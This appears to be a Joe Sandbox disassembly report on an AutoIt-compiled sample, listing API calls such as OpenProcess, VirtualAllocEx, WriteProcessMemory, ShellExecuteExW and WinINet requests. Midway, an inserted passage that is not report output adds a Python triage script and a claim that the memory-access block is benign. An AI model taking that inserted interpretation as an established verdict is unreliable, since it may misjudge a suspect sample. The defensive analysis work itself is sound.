                                                • String ID:
                                                • API String ID: 1489400265-0
                                                • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                APIs
                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                • DestroyWindow.USER32(?), ref: 00455728
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                • String ID:
                                                • API String ID: 1042038666-0
                                                • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                APIs
                                                • __getptd.LIBCMT ref: 0041780F
                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                • __getptd.LIBCMT ref: 00417826
                                                • __amsg_exit.LIBCMT ref: 00417834
                                                • __lock.LIBCMT ref: 00417844
                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                Similarity
                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                • String ID:
                                                • API String ID: 938513278-0
                                                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                APIs
                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                • __freefls@4.LIBCMT ref: 00413D74
                                                Similarity
                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                • String ID:
                                                • API String ID: 2403457894-0
                                                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                APIs
                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                • ExitThread.KERNEL32 ref: 004151ED
                                                • __freefls@4.LIBCMT ref: 00415209
                                                Similarity
                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                • String ID:
                                                • API String ID: 4247068974-0
                                                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                Similarity
                                                • API ID:
                                                • String ID: )$U$\
                                                • API String ID: 0-3705770531
                                                • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                APIs
                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                • CoUninitialize.OLE32 ref: 0046E53D
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \
                                                • API String ID: 4104443479-2967466578
                                                • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \
                                                • API String ID: 4104443479-2967466578
                                                • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \
                                                • API String ID: 4104443479-2967466578
                                                • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                Similarity
                                                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 708495834-557222456
                                                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                APIs
                                                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \$]$h
                                                • API String ID: 4104443479-3262404753
                                                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                APIs
                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • CloseHandle.KERNEL32(?), ref: 00457E09
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                • String ID: <$@
                                                • API String ID: 2417854910-1426351568
                                                • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3705125965-3916222277
                                                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
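The two API blocks above (the WriteProcessMemory/ReadProcessMemory block around 004365EF and the WinINet block around 0044A87A) are easier to triage once their numeric arguments are decoded. The Python script below is an added example and is not part of the Joe Sandbox report or of the sample: it parses lines in the report's own "API.MODULE(args), ref: address" layout, expands the OpenProcess access mask, the VirtualAllocEx allocation type and page protection, and the tree-view message identifiers using their Windows SDK values (winnt.h, commctrl.h), and flags a block that carries the full cross-process read/write primitive. The sample lines embedded in it are copied from the two blocks above; the triage labels remote_memory_primitive, executable_remote_alloc and remote_thread are the script's own heuristics, not Joe Sandbox signatures.

```python
import re
from typing import Dict, List, Optional

# One "APIs" line of a Joe Sandbox disassembly block, in the three shapes the report uses:
#   • OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
#   • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(...), ref: 00434408
#   • GetMenuItemInfoW.USER32 ref: 0045FAC4            (no argument list shown)
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref: (?P<ref>[0-9A-Fa-f]{8})"
)

# Flag names as defined in the Windows SDK headers (winnt.h).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Tree-view messages (commctrl.h): TV_FIRST 0x1100 + 4 and + 17. Their lParam must point
# into the address space of the process that owns the control.
CONTROL_MSG = {0x1104: "TVM_GETITEMRECT", 0x1111: "TVM_HITTEST"}

REMOTE_MEMORY_APIS = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"}
THREAD_APIS = {"CreateRemoteThread", "NtCreateThreadEx", "QueueUserAPC",
               "SetThreadContext", "NtSetContextThread"}


def parse_api_line(line: str) -> Optional[Dict]:
    """Split one report line into api, module, argument list, ref and subcall address."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = m.group("args")
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args.split(",") if args is not None else [],
            "ref": m.group("ref"), "subcall": m.group("sub")}


def hex_arg(args: List[str], index: int) -> Optional[int]:
    """Argument `index` as an int, or None where the report shows '?' (unknown statically)."""
    if index >= len(args) or not re.fullmatch(r"[0-9A-Fa-f]+", args[index]):
        return None
    return int(args[index], 16)


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bitmask into flag names, lowest bit first; unknown bits are kept as hex."""
    names, covered = [], 0
    for bit, name in sorted(table.items()):
        if (value & bit) == bit:
            names.append(name)
            covered |= bit
    if value & ~covered:
        names.append(f"0x{value & ~covered:X}")
    return names


def analyze_block(lines: List[str]) -> Dict:
    """Decode the interesting arguments of one block and apply simple triage heuristics."""
    calls = [c for c in (parse_api_line(l) for l in lines) if c]
    apis = {c["api"] for c in calls}
    decoded: Dict[str, List[str]] = {}
    executable_alloc = False
    for c in calls:
        a, key = c["args"], f"{c['api']}@{c['ref']}"
        if c["api"] == "OpenProcess" and hex_arg(a, 0) is not None:
            decoded[key] = decode_flags(hex_arg(a, 0), PROCESS_ACCESS)
        elif c["api"] == "VirtualAllocEx":
            alloc, prot = hex_arg(a, 3), hex_arg(a, 4)
            if alloc is not None and prot is not None:
                decoded[key] = decode_flags(alloc, ALLOC_TYPE) + decode_flags(prot, PAGE_PROTECT)
                executable_alloc |= bool(prot & 0xF0)  # any PAGE_EXECUTE* protection
        elif c["api"] == "SendMessageW" and hex_arg(a, 1) in CONTROL_MSG:
            decoded[key] = [CONTROL_MSG[hex_arg(a, 1)]]
    return {
        "calls": [c["api"] for c in calls],
        "decoded": decoded,
        # all four primitives needed to read and write another process's memory
        "remote_memory_primitive": REMOTE_MEMORY_APIS <= apis,
        # an executable remote buffer or a thread/APC/context API would point at injection
        "executable_remote_alloc": executable_alloc,
        "remote_thread": bool(apis & THREAD_APIS),
    }


# Sample input: the two API blocks copied from this report.
REMOTE_MEMORY_BLOCK = """
• Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
• Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
• Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
• Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
• Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
""".strip().splitlines()
HTTP_BLOCK = """
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
• Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
""".strip().splitlines()

if __name__ == "__main__":
    for name, block in (("remote memory block", REMOTE_MEMORY_BLOCK), ("WinINet block", HTTP_BLOCK)):
        print(name, analyze_block(block))
```

On the first block the script reports PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE and PROCESS_QUERY_INFORMATION for the 0x438 access mask, MEM_COMMIT plus PAGE_READWRITE for the allocation, and TVM_GETITEMRECT / TVM_HITTEST for the 0x1104 / 0x1111 messages. A non-executable buffer exchanged through tree-view messages, with no thread-creation, APC or context API in the block, is the way a process queries a common control owned by another process (the lookup of AU3_GetPluginDetails later in this section is the export AutoIt3 resolves in plugin DLLs, and this is how an AutoIt runtime services its control-query functions). Taken alone, this block is therefore a cross-process control query; the thread-injection and APC-queueing signatures in the report are dynamic findings and should be matched against the run-time process-injection evidence rather than against this function.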
                                                APIs
                                                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem
                                                • String ID: 0
                                                • API String ID: 135850232-4108050209
                                                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                APIs
                                                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID: AU3_GetPluginDetails
                                                • API String ID: 145871493-4132174516
                                                • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
